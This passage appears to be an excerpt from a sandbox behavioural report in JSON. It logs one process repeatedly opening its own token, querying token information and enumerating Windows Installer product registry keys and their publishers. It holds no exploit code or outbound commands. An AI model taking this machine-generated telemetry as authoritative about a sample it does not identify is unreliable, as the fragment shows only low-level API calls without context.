"0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1043 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00;\\x00\\x00\\x00\\xff\\x07\\x00\\x00" } ], "repeated": 0, "id": 1044 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1045 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\EAEFC47574231664CA1BD3EFB96C36EF" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\EAEFC47574231664CA1BD3EFB96C36EF" } ], "repeated": 0, "id": 1046 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1047 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\xa4\\x9e\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 1048 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1049 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\EAEFC47574231664CA1BD3EFB96C36EF" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\EAEFC47574231664CA1BD3EFB96C36EF" } ], "repeated": 0, "id": 1050 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1051 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1052 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "L\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xac\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\xb3\\x9b\\x18\\x00\"\r\\xc6r\\xd0\\x9b\\x18\\x00\\xc4\\x9b\\x18\\x00H\\x00\\x00\\x00\\xf4\\x9b\\x18\\x00\\xbc\\x9e\\x18\\x00" } ], "repeated": 0, "id": 1053 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1054 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\EAEFC47574231664CA1BD3EFB96C36EF\\InstallProperties" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\EAEFC47574231664CA1BD3EFB96C36EF\\InstallProperties" } ], "repeated": 0, "id": 1055 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\EAEFC47574231664CA1BD3EFB96C36EF\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 1056 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1057 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1058 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00J\"A\\x00\\x1c4\\x1cw" } ], "repeated": 0, "id": 1059 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1060 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 1061 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegEnumKeyExA", "status": false, "return": "0x00000103", "pretty_return": "NO_MORE_ITEMS", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "Index", "value": "10" }, { "name": "Name", "value": "" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\" } ], "repeated": 0, "id": 1062 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1063 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Classes\\Installer\\Products" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products" } ], "repeated": 0, "id": 1064 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "Index", "value": "0" }, { "name": "Name", "value": "2C6A1CF1E675A984B9A4292DF1451263" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" } ], "repeated": 0, "id": 1065 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 1066 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x80\\x00\\x00\\x00" } ], "repeated": 0, "id": 1067 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 1068 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 1069 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 1070 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\xb0\\xae\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 1071 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 1072 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000384" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 1073 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000384" }, { "name": "SubKey", "value": "2C6A1CF1E675A984B9A4292DF1451263" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" } ], "repeated": 0, "id": 1074 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 1075 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1076 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1077 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00;\\x00\\x00\\x00\\xff\\x07\\x00\\x00" } ], "repeated": 0, "id": 1078 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1079 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" } ], "repeated": 0, "id": 1080 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 1081 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\xa4\\x9e\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 1082 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1083 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" } ], "repeated": 0, "id": 1084 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Classes\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products\\2C6A1CF1E675A984B9A4292DF1451263" } ], "repeated": 0, "id": 1085 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1086 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\2C6A1CF1E675A984B9A4292DF1451263\\InstallProperties" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\2C6A1CF1E675A984B9A4292DF1451263\\InstallProperties" } ], "repeated": 0, "id": 1087 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegQueryValueExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Data", "value": "Microsoft Corporation" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\2C6A1CF1E675A984B9A4292DF1451263\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 1088 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 1089 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Classes\\Installer\\Products" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Installer\\Products" } ], "repeated": 0, "id": 1090 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "Index", "value": "1" }, { "name": "Name", "value": "671B50879509DB54C8A4B5E90B2C3C78" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Installer\\Products\\671B50879509DB54C8A4B5E90B2C3C78" } ], "repeated": 0, "id": 1091 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 1092 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x80\\x00\\x00\\x00" } ], "repeated": 0, "id": 1093 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 1094 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 1095 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 1096 }, { "timestamp": "2025-02-27 23:34:18,034", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": 